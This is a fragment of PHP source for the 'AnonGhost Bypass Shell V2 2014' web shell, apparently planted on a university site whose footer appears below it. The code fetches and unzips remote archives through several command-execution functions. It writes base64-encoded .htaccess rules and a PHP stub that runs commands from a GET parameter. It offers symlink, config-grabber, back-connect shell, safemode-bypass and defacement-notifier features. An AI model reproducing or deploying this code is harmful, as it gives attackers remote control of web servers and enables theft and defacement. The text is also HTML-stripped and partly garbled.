"; @error_reporting(0); $file = $_POST['shell']; //Generate zip file mkdir('wooooot', 0755); chdir('wooooot'); $fopen = fopen("v4.zip",'w'); $shell = @file_get_contents($file); $swrite = fwrite($fopen ,$shell); if($swrite){ echo "Zip File Downloaded Successfully\n"; sleep(2); echo "

Going To Unzip the File to Get r00t....

"; sleep(2); //system system('unzip v4.zip'); //passthru passthru('unzip v4.zip'); //shell_exec shell_exec('unzip v4.zip'); //exec exec('unzip v4.zip'); //proc_open proc_open('unzip v4.zip'); sleep(1); //Extracting htaccess For Symlink chdir('wooooot'); $htaccess = 'T1BUSU9OUyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzIFN5bUxpbmtzSWZPd25lck1hdGNoIEluY2x1ZGVzIEluY2x1ZGVzTk9FWEVDIEV4ZWNDR0kNCk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcw0KRm9yY2VUeXBlIHRleHQvcGxhaW4NCkFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIA0KQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sDQpBZGRUeXBlIHRleHQvaHRtbCAuc2h0bWwNCkFkZFR5cGUgdHh0IC5waHANCkFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAuaHRtbA0KQWRkSGFuZGxlciB0eHQgLnNodG1sDQpPcHRpb25zIEFsbA0KT3B0aW9ucyBBbGw='; $priv8priv = fopen(".htaccess" ,"w+"); $xwrite = fwrite ($priv8priv ,base64_decode($htaccess)); sleep(1); echo "

Loading Perl unzipper.... \!/

"; //dezipper.pl generate chdir('wooooot'); $l0vercodee = 'eyANCnN5c3RlbSgidW56aXAgdjQuemlwIik7DQpleGVjKCJ1bnppcCB2NC56aXAiKTsNCnBhc3N0aHJ1KCJ1bnppcCB2NC56aXAiKTsNCnNoZWxsX2V4ZWMoInVuemlwIHY0LnppcCIpOw0KcHJvY19vcGVuKCJ1bnppcCB2NC56aXAiKTsNCn0='; $greatshiit = fopen("dezipper.pl" ,"w+"); $write = fwrite ($greatshiit ,base64_decode($l0vercodee)); if($write){ echo "

Perl Unzipper Downloaded Successfully

"; fclose($greatshiit); chmod("dezipper.pl",0755); echo "

Unzipping File with Perl \!/

"; system('perl dezipper.pl'); passthru('perl dezipper.pl'); shell_exec('perl dezipper.pl'); exec('perl dezipper.pl'); proc_open('perl dezipper.pl'); echo"
Link=====>Root Path"; } } } if(isset($_GET['action']) && $_GET['action'] == 'zonh'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; ?>

Mass Zone-h Notifier




Visit '.$_SERVER['HTTP_HOST'].'/.htaccess?c=
'; } else{ $o = stripslashes(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW1wnY1wnXSk7ID8+")); $a = fopen("gsbtr.php", "w"); fputs($a, $o); fclose($a); echo '
Visit '.$_SERVER['HTTP_HOST'].'/gsbtr.php?c=
'; } } else{ ?>
Hide Shell

".file_get_contents("http://".$_SERVER['HTTP_HOST']."/".$writeblefilepath).""; @unlink($flib); } else{ ?>

Symlink #2

First time Click here

File path:


Site path:




'; } ?>
Files Manager



    Change directory              

    Make directory                  

File deleted


'; } if(is_dir($file)){ function rmdirs($d) { $f = glob($d . '*', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } rmdirs($file); echo '    Folder deleted

'; } } else{ echo '    File or folder does not exist

'; } } // rename if(isset($_GET['old_name']) && !empty($_GET['rename_file']) && !empty($_GET['action']) && $_GET['action'] == 'mumpet'){ $old = $_GET['old_name']; $new = $_GET['rename_file']; // if new file or folder exist if(is_dir($new) || file_exists($new)){ echo '    File or folder exists. delete

'; } else{ // if file or folder exist if(is_dir($old) || file_exists($old)){ if(rename($old, $new)){ if(is_dir($old)){ echo "    Folder renamed sucsessfuly to ".$new.", open

"; } if(!is_dir($old)){ echo "    File renamed sucsessfuly to ".$new.", open

"; } } else{ echo "    Problem renaming ".$old."

"; } } else{ echo '    File or folder not found.

'; } } } if(isset($_GET['rename']) && !empty($_GET['action']) && $_GET['action'] == 'mumpet'){ $file = $_GET['rename']; ?>
    Old Name:   
    Rename to:  
                      

Directory exist.
delete

'; } else{ if(mkdir($new)){ echo '    Directory created

'; } else{ echo '    Problem creating directory

'; } if(!is_dir($dir)){ chdir($go); if(mkdir($new)){ echo '    Directory created

'; } else{ echo '    Problem creating directory

'; } } } } } $self = $_SERVER['PHP_SELF']; $dir = getcwd(); if(isset($_GET['go'])) { $dir = $_GET['go']; } if(is_dir($dir)) { $handle = opendir($dir); { showDrives(); ?>

      back             forward    

[ ] > Delete Rename Download Upload
;" href='?view='> > Delete Rename Download
Permission Denied

"; } ?>





Bypassed !
'; exit; } echo '
Disable Function :
'; if(''==($func=@ini_get('disable_functions'))) { echo "No Security for Functions"; }else{ echo '[ Please Bypass Safemode First! ]

'; echo "
$func
"; echo '
'; } echo '

'; echo "

Server IP : ";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); echo "      Bing Search   -   Zone-H

"; echo '
Apache Modules :
'; echo '

AnonGhost Bypass Shell V2 2014
is created for Educational Purpose and testing on your own server, and not responsible for any misuse of it.


Coded by Virusa Worm - Mauritania Attacker | Special thankz to : AnonGhost Team




Greetz to :
AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - AnonSec - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG - Afghan Cyber Army (ACA) - [ Tanpa Bicara - Maniak k4Sur [pasangan galo.. lol..]]

'; } ?>
Uploader
'; echo '
Upload Files From Computer
'; echo '


'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '

upload sukses..


'; } else { echo '
aseeeemmm.., ora iso upload...

'; } } if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text']; $newfile=$_POST['rename']; if (!copy($file, $newfile)) {echo "failed to copy $file...\\n";}} echo '
Upload Files From URL


Rename to:

'; } if($action == "kill"){ echo '
Do you really want to delete this shell ?


'; ?>
Yes       No



Shell has been Killed...Take Care And Stay Safe
'); else echo 'unlink error!'; } if($action == "logout"){ unset($_SESSION['loggedin']); echo '
You Have Logged Out Bro ' .$username. ' ..


';} }} else{ //IF SOMEONE GET BANNED SHELL WILL SUICIDE LIKE KAMIKAZ wkwkwkkwkwkw xD if(isset($_SESSION['banned'])){ if($_SESSION['banned'] == '13'){ $file = $_SERVER['PHP_SELF']; if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('

I SUICIDE BECAUSE YOUR STUPID BEHAVIOUR xD ! AND YOU THINK THAT YOU ARE SMART lulZ !
'); }} ?>

AnonGhost Bypass Shell V2 2014 is created for Educational Purpose and testing on your own server, and not responsible for any misuse of it.
Kernel Version :
';echo php_uname(); echo ''; ?>
50){ die("
Maybe you are Drunk O.o...".$warn."
"); } if($pass != $password || $user!=$username){ if(isset($_SESSION['banned'])){ if($_SESSION['banned'] == '1'){ $_SESSION['banned'] = '2'; die("
MadaFucka' What are you trying Skid :p ".$warn."

BANNED

"); } if($_SESSION['banned'] == '2'){ $_SESSION['banned'] = '3'; die("
".$warn."Go Play in Da Street Script Kiddi u were banned xD

You have been BANNED!

"); } } else{ $_SESSION['banned'] = '1'; } } else{ $_SESSION['loggedin'] = 'true'; echo "

Salam Aleykum " .$username. " . ♥
"; echo "

✓ You are Successfully Logged in and Redirecting Now Ghost.... or Click here
"; header('location: '.$_SERVER['PHP_SELF']); } } ?>
© AnonGhost Bypass Shell V2 2014 | Coded by Virusa Worm - Mauritania Attacker - GrenCoder

© 2018 DIVISI ICT P3M FEB UNIVERSITAS WINAYA MUKTI. All rights reserved.